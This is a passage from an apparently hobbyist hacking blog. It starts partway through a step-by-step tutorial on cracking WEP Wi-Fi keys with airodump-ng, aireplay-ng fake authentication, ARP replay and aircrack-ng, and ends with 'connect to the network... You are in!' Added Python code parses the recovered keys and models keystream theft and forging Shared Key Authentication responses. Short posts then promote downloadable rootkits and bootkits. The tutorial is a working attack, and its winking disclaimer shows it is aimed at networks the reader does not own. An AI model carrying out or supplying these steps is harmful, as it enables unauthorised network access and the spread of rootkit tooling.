This stops airodump from populating networks and freezes the screen so that you can read the information you need.


**From here on, when I tell you to type a command, replace whatever is in parentheses with the value from your own screen. For example, if I say to type:
-c (channel)
then don't actually type in
-c (channel)
Instead, replace it with the channel number, so for example you would type:
-c 6
Can't be much clearer than that... let's continue...


Now find the network that you want to crack and MAKE SURE that its encryption column says WEP. If it says WPA or any variation of WPA, move on; WPA can also be attacked with BackTrack and other tools, but it is a whole other ball game, and you need to master WEP first.


Once you've decided on a network, take note of its channel number and BSSID. The BSSID is the access point's MAC address, six colon-separated hex pairs in the form XX:XX:XX:XX:XX:XX.
The channel number will be under the heading "CH".
Now, in the same Konsole window, type:


airodump-ng -c (channel) -w (file name) --bssid (bssid) ath0


The FILE NAME can be whatever you want. It is simply the prefix of the files in which airodump stores the packets it captures, for cracking later. You don't put an extension on it; just pick a word that you will remember. I usually make mine "wepkey" because I can always remember it.


**Side note: if you crack more than one network in the same session, you must use a different file name for each one or it won't work. I usually just name them wepkey1, wepkey2, etc.


Once you have typed in that last command, the airodump screen changes and starts to show your computer gathering packets. You will also see a column headed "IV" (called "#Data" in newer airodump-ng versions) with a number underneath it. IV stands for "Initialization Vector": WEP prepends a 24-bit IV to the shared key to make a fresh RC4 key for every packet, and that IV is transmitted in the clear. Because the IV space is tiny and some IVs leak bytes of the key into the first byte of the keystream, collecting enough distinct IVs lets a statistical attack recover the key. Once you gain a minimum of 5,000 of these IVs you can try to crack the password. I've cracked some right at 5,000 and others have taken over 60,000. How many you need depends on the key length (40-bit or 104-bit) and on which IVs you happen to capture, not on how "hard" the key looks: any WEP key falls once enough IVs are in.


Now you are thinking, "I'm screwed because my IV's are going up really slowly." Well, don't worry, now we are going to trick the router into giving us HUNDREDS of IV's per second.


3. Actually cracking the WEP password


Now leave this Konsole window up and running and open up a 2nd Konsole window. In this one type:


aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 ath0




This sends a fake authentication and association to the router, so that it treats your card as a connected client even though you never supplied the key. The MAC after -h must be the address your wireless card is actually using right now (check it with ifconfig or macchanger -s); if you did not change your card's MAC to 00:11:22:33:44:55, put your card's real MAC there instead, or many drivers will not inject correctly and the association fails. If the command is successful, you should see about 4 lines of text print out, with the last one saying "Association successful :-)". If this happens, then good! You are almost there. Now type:


aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 ath0




This is the ARP request replay attack. aireplay-ng listens for an ARP request on the network and then re-sends that same frame to the router over and over; the router re-broadcasts its reply each time, WEP-encrypting it with a new IV, so every replay yields another IV. You will see a status line counting the packets read and the ARP requests and ACKs received. Don't worry about what these mean; just know that they are your meal tickets. Now you just sit and wait. Once your computer finally captures an ARP request, it starts replaying it and you will see the ARP and ACK counters climb by hundreds per second. Sometimes this starts within seconds, sometimes you have to wait a few minutes (a client on the network has to send an ARP request first). Just be patient. When it finally does happen, switch back to your first Konsole window and you should see the number under IV rising rapidly. This is great! It means you are almost finished! When this number reaches AT LEAST 5,000 you can start your crack. It will probably take more than this, but I always start my password cracking at 5,000 just in case they have a really weak password.


Now you need to open up a 3rd and final Konsole window. This will be where we actually crack the password. Type:


aircrack-ng -b (bssid) (filename)-01.cap


Remember the filename you made up earlier? Mine was "wepkey". Don't put a space between it and -01.cap; type it as you see it. So for me, I would type wepkey-01.cap
Once you have done this you will see aircrack-ng fire up and begin to crack the key. Typically you have to wait for more like 10,000 to 20,000 IVs before it succeeds. If it cannot crack with what you have so far, it will say something like "Failed. Next try with 10000 IVs." DON'T DO ANYTHING! It stays running; it is just letting you know that it is paused until more IVs are gathered. Once you pass the 10,000 mark it will automatically fire up again and try to crack it. If this fails it will say "Failed. Next try with 15000 IVs." and so on until it finally gets it.




If you do everything correctly up to this point, before too long you will have the key! Now if the key looks goofy, don't worry, it will still work. aircrack-ng always shows the recovered key as hex bytes separated by colons, for example:
KEY FOUND! [ 73:65:63:72:65 ]
If every byte happens to be a printable character, it also shows the ASCII version in parentheses, e.g. (ASCII: secre ), which is exactly what the owner typed in. When no ASCII is shown, the owner entered the key as hex digits and the colon-separated hex is all there is.


A WEP key is always 5 bytes (40-bit, sold as "64-bit WEP") or 13 bytes (104-bit, "128-bit WEP"), so the hex form is always 10 or 26 hex digits using only 0-9 and A-F. Either form gets you in: take the hex digits without the colons (7365637265 for the example above) and enter them in your client's hex WEP key field, or enter the ASCII string if one was shown. Boot back into whatever operating system you use, connect to the network, type the key, and presto! You are in!
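Added example, not part of kumalynx's tutorial or of aircrack-ng itself: a small parser for the key line that aircrack-ng prints, turning it into the string you type into a client and checking that the length is a legal WEP key size, plus a helper that picks up the "Next try with N IVs" pause message so a script can wait for more IVs. The two sample output snippets are constructed, modelled on aircrack-ng's wording; the function names are my own.

```python
import re

# Constructed snippets in the format aircrack-ng prints (not real captures).
SAMPLE_SUCCESS = """
                 [00:00:03] Tested 1215 keys (got 12894 IVs)
                  KEY FOUND! [ 73:65:63:72:65 ] (ASCII: secre )
        Decrypted correctly: 100%
"""
SAMPLE_FAILED = """
                 [00:00:01] Tested 521 keys (got 6201 IVs)
        Failed. Next try with 10000 IVs.
"""

KEY_LINE = re.compile(r"KEY FOUND!\s*\[\s*([0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2})+)\s*\]")
RETRY_LINE = re.compile(r"Next try with (\d+) IVs")


def parse_aircrack_key(output: str):
    """Return None if aircrack-ng has not printed a key yet; otherwise a dict with
    the hex form (what you type, colons stripped), the ASCII form (None unless
    every byte is printable, which is when aircrack-ng shows "(ASCII: ...)"),
    the key size in bits, and whether that size is one WEP actually allows:
    5 bytes = 40-bit ("WEP-64") or 13 bytes = 104-bit ("WEP-128")."""
    m = KEY_LINE.search(output)
    if m is None:
        return None
    key = bytes.fromhex(m.group(1).replace(":", ""))
    printable = all(0x20 <= b < 0x7F for b in key)
    return {
        "hex": key.hex().upper(),
        "ascii": key.decode("ascii") if printable else None,
        "bits": len(key) * 8,
        "valid_length": len(key) in (5, 13),
    }


def next_retry_ivs(output: str):
    """IV count at which aircrack-ng said it will retry, or None if absent."""
    m = RETRY_LINE.search(output)
    return int(m.group(1)) if m else None


if __name__ == "__main__":
    print(parse_aircrack_key(SAMPLE_SUCCESS))   # hex 7365637265, ascii secre, 40 bits
    print(next_retry_ivs(SAMPLE_FAILED))        # 10000
```

A key whose "valid_length" is False cannot be a real WEP key, which is the quickest way to catch a mistyped or truncated key line; the hex form works with every client, the ASCII form only when one was shown.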


It may seem like a lot to deal with if you have never done it, but after a few successful attempts, you will get very quick with it. If I am near a WEP encrypted router with a good signal, I can often crack the password in just a couple of minutes.


I am not responsible for what you do with this information. Any malicious/illegal activity that you do, falls completely on you because...technically...this is just for you to test the security of your own network. :-)


I will gladly answer any legitimate questions anyone has to the best of my ability.
HOWEVER, I WILL NOT ANSWER ANYONE THAT IS TOO LAZY TO READ THE WHOLE TUT AND JUST ASKS ME SOME QUESTION THAT I CLEARLY ANSWERED. No one wants to hold your hand through this...read the tut and go experiment until you get it right.


There are rare occasions where someone will use WEP with SKA (Shared Key Authentication) as well. In that case the fake authentication step above fails: the router sends a challenge that has to be returned WEP-encrypted, so you first need a keystream (PRGA) captured from a real client's authentication, which aireplay-ng can then use through its -y option. Therefore the steps I laid out here will not work as-is. I've only seen this once or twice, though, so you probably won't run into it. If I get motivated, I may throw up a tut on how to crack this in the future.
Hacking WEP wifi passwords
By kumalynx
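Added example, not part of kumalynx's tutorial nor of the aircrack-ng code base: a minimal model of WEP in Python that shows what the tutorial hand-waves over in the ARP replay step (why every replayed ARP frame hands the attacker a fresh IV plus known keystream) and in the SKA note at the end (why a sniffed keystream is enough to pass Shared Key Authentication without the key). The key, IVs, challenges and frames are constructed for illustration; the function names are mine, and the SKA frames leave out the real authentication header bytes.

```python
import zlib

WEP_KEY = bytes.fromhex("0123456789")        # constructed 40-bit ("64-bit") WEP key
# LLC/SNAP header that begins every 802.11 data frame carrying ARP: known plaintext.
ARP_SNAP_HEADER = bytes.fromhex("aaaa030000000806")


def rc4(key: bytes, length: int) -> bytes:
    """Return `length` bytes of RC4 keystream for `key` (KSA, then PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return zlib.crc32(data).to_bytes(4, "little")


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = IV (3 bytes, sent in clear) || RC4(IV||key) XOR (plaintext||ICV)."""
    stream = rc4(iv + key, len(plaintext) + 4)
    return iv + xor(plaintext + icv(plaintext), stream)


def wep_decrypt(key: bytes, frame: bytes):
    """Return the plaintext if the ICV checks out, else None (what the AP does)."""
    iv, body = frame[:3], frame[3:]
    plain = xor(body, rc4(iv + key, len(body)))
    data, tag = plain[:-4], plain[-4:]
    return data if icv(data) == tag else None


def recover_keystream(frame: bytes, known_plaintext: bytes):
    """Known-plaintext attack: keystream prefix = ciphertext XOR plaintext.
    Needs no key. Returns (iv, keystream[:len(known_plaintext)])."""
    iv, body = frame[:3], frame[3:]
    return iv, xor(body[: len(known_plaintext)], known_plaintext)


def arp_replay_keystreams(key: bytes, arp_plain: bytes, replays: int, first_iv: int = 1):
    """Model of aireplay-ng -3: the AP re-encrypts the same replayed ARP frame
    every time under a new IV (sequential here, as most APs do). The sniffer
    XORs off the SNAP header and gets one (IV, 8-byte keystream) pair per
    replay; these are the IVs airodump-ng counts and aircrack-ng feeds to its
    statistical (PTW/KoreK) key recovery, which is not modelled here."""
    pairs = {}
    for n in range(first_iv, first_iv + replays):
        iv = n.to_bytes(3, "big")
        frame = wep_encrypt(key, iv, arp_plain)
        iv, stream = recover_keystream(frame, ARP_SNAP_HEADER)
        pairs[iv] = stream
    return pairs


def ska_forge_response(iv: bytes, keystream: bytes, challenge: bytes) -> bytes:
    """Shared Key Auth: the AP sends a 128-byte challenge in clear and expects it
    back WEP-encrypted. One sniffed (IV, keystream) pair long enough to cover
    challenge + ICV, taken from a real client's exchange, lets an attacker
    answer a NEW challenge under the same IV with no key at all (this is the
    PRGA file aireplay-ng consumes with -y). Real SKA frames carry a few more
    header bytes, omitted in this model."""
    return iv + xor(challenge + icv(challenge), keystream[: len(challenge) + 4])


def ska_demo(key: bytes) -> bool:
    """Sniff a legitimate client's SKA reply, then pass SKA ourselves."""
    c1 = bytes(range(128))                          # constructed challenge to the real client
    legit_reply = wep_encrypt(key, b"\x00\x00\x07", c1)
    iv, stream = recover_keystream(legit_reply, c1 + icv(c1))  # the ICV of c1 is known too
    c2 = bytes(255 - b for b in range(128))         # constructed challenge sent to the attacker
    forged = ska_forge_response(iv, stream, c2)
    return wep_decrypt(key, forged) == c2


if __name__ == "__main__":
    arp = ARP_SNAP_HEADER + bytes(28)               # constructed ARP body after the header
    for iv, stream in arp_replay_keystreams(WEP_KEY, arp, 3).items():
        print("IV", iv.hex(), "leaks keystream", stream.hex())
    print("SKA passed without the key:", ska_demo(WEP_KEY))
```

The model makes the tutorial's two rules of thumb concrete: the IV counter is really a count of distinct (IV, keystream) samples, which is why a replayed ARP frame (fixed, known first 8 bytes) is such a good generator, and SKA only moves the problem, because the challenge/response pair itself is a known-plaintext sample long enough to forge the next response.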

Related books: Wireless Hacking: Projects for Wi-Fi Enthusiasts (Cut the cord and discover the world of wireless hacks!); Hacking Exposed Wireless

Monday, August 22, 2011

.NET Framework Rootkits


The whitepaper ".NET Framework rootkits - backdoors inside your framework" (PDF) covers various ways to develop rootkits for the .NET Framework, so that every EXE/DLL that runs on a modified Framework behaves differently from what it is supposed to do. Code reviews will not detect backdoors installed inside the Framework, since the payload is not in the application's code but inside the Framework implementation. Framework rootkits enable the attacker to install a reverse shell inside the Framework, steal valuable information, fixate encryption keys, disable security checks and perform other nasty things, as described in the paper.


The paper also introduces .NET-Sploit 1.0, a new tool for building MSIL rootkits that lets the user inject a preloaded or custom payload into the Framework's core DLLs.

Download and more info

Vbootkit 2.0



Vbootkit 2.0 is now open-source


Two security researchers have open-sourced code that can be used to take control of Microsoft Windows 7 x64. The team decided to release the code despite initial reservations over security.

Vbootkit 2.0 Attacking Windows 7 (x64) via Boot Sectors presentation

Download Vbootkit 2.0 source code 

Swimming into Trojan and Rootkit GameThief.Win32.Magania Hostile Code



Trojan-GameThief.Win32.Magania, according to Kaspersky's naming convention, monitors the user's activities trying to obtain valuable information from the affected user, especially gaming login credentials. This long tutorial analyzes this malware, but it is also a general document explaining how to analyze a modern nested-dolls malware.


In this paper we analyse the structure of this malware more deeply, especially the polymorphic part, which is a typical sample of hostile code. From the first load into IDA we can see that Magania's PE structure and Import Table are destroyed; the paper shows how this looks in WinGraph.


Download PDF

2009 Protecting OSs from RootKits

Countering Kernel Rootkits with Lightweight Hook Protection

Kernel rootkits have posed serious security threats due to their stealthy manner. To hide their presence and activities, many rootkits hijack control flows by modifying control data or hooks in kernel space. A critical step towards eliminating rootkits is to protect such hooks from being hijacked. However, this remains a challenge because there are a large number of widely scattered kernel hooks, many of which can be dynamically allocated from the kernel heap and co-located with other kernel data. In addition, there is a lack of flexible commodity hardware support, leading to the so-called protection granularity gap: kernel hook protection requires byte-level granularity, but commodity hardware only provides page-level protection.

Source: Schneier on Security

Download PDF

Stoned Bootkit


The Stoned Bootkit is a rootkit that is booted before the main operating system and is able to stay and hide itself in memory while the guest operating system runs. The payload is executed beside the running operating system and ships with the bootkit. Stoned is designed to be operating system independent; it is multiplatform. It currently supports all 32-bit and 64-bit Windows systems and Linux.

It allows a very wide abstraction between the program and the platform it runs on, which makes it a new deployment platform for software. The current proof-of-concept payloads are a local privilege escalation and a remote surveillance tool. The platform, however, is open for future third-party development.

The bootkit itself has an integrated module and plugin structure that allows extending its core features without touching the core code. New in this version is that it is totally independent of the boot medium: it can be started from the hard disk (master boot record), but also from CD/DVD/BD or even over the network.

Download PDF